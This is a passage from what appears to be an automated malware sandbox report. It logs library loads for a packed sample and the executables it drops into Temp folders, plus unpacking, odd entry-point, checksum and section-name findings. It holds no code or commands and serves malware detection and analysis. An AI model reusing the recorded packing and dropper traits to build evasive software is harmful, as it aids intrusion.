Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: winmm.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: sspicli.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: wininet.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: ncrypt.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: ntasn1.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: iertutil.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: windows.storage.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: wldp.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: profapi.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: winhttp.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: mswsock.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: winnsi.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: urlmon.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: srvcli.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: netutils.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: winmm.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: sspicli.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: wininet.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: ncrypt.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: ntasn1.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: iertutil.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: windows.storage.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: wldp.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: profapi.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: winhttp.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: mswsock.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: winnsi.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: urlmon.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: srvcli.dll
Source: C:\Users\user\1000026002\cee706a53f.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: file.exe Static file information: File size 1928192 > 1048576
Source: file.exe Static PE information: Raw size of mmzmokro is bigger than: 0x100000 < 0x1a5200

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.630000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mmzmokro:EW;mnjwdapr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mmzmokro:EW;mnjwdapr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.d80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mmzmokro:EW;mnjwdapr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mmzmokro:EW;mnjwdapr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 3.2.skotes.exe.d80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mmzmokro:EW;mnjwdapr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mmzmokro:EW;mnjwdapr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 8.2.skotes.exe.d80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mmzmokro:EW;mnjwdapr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mmzmokro:EW;mnjwdapr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Unpacked PE file: 10.2.8a145ab7b3.exe.d80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;spyqlfjc:EW;scxfhudm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;spyqlfjc:EW;scxfhudm:EW;.taggant:EW;
Source: C:\Users\user\1000026002\cee706a53f.exe Unpacked PE file: 11.2.cee706a53f.exe.750000.0.unpack :EW;.rsrc :W;.idata :W; :EW;spyqlfjc:EW;scxfhudm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;spyqlfjc:EW;scxfhudm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Unpacked PE file: 18.2.8a145ab7b3.exe.d80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;spyqlfjc:EW;scxfhudm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;spyqlfjc:EW;scxfhudm:EW;.taggant:EW;
Source: C:\Users\user\1000026002\cee706a53f.exe Unpacked PE file: 23.2.cee706a53f.exe.750000.0.unpack :EW;.rsrc :W;.idata :W; :EW;spyqlfjc:EW;scxfhudm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;spyqlfjc:EW;scxfhudm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Unpacked PE file: 24.2.8a145ab7b3.exe.d80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;spyqlfjc:EW;scxfhudm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;spyqlfjc:EW;scxfhudm:EW;.taggant:EW;
Source: C:\Users\user\1000026002\cee706a53f.exe Unpacked PE file: 27.2.cee706a53f.exe.750000.0.unpack :EW;.rsrc :W;.idata :W; :EW;spyqlfjc:EW;scxfhudm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;spyqlfjc:EW;scxfhudm:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: 8a145ab7b3.exe.8.dr Static PE information: real checksum: 0x1cb7f9 should be: 0x1d1f25
Source: random[1].exe.8.dr Static PE information: real checksum: 0x1cb7f9 should be: 0x1d1f25
Source: cee706a53f.exe.8.dr Static PE information: real checksum: 0x1cb7f9 should be: 0x1d1f25
Source: file.exe Static PE information: real checksum: 0x1dc4d4 should be: 0x1d82ca
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1dc4d4 should be: 0x1d82ca
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: mmzmokro
Source: file.exe Static PE information: section name: mnjwdapr
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: mmzmokro
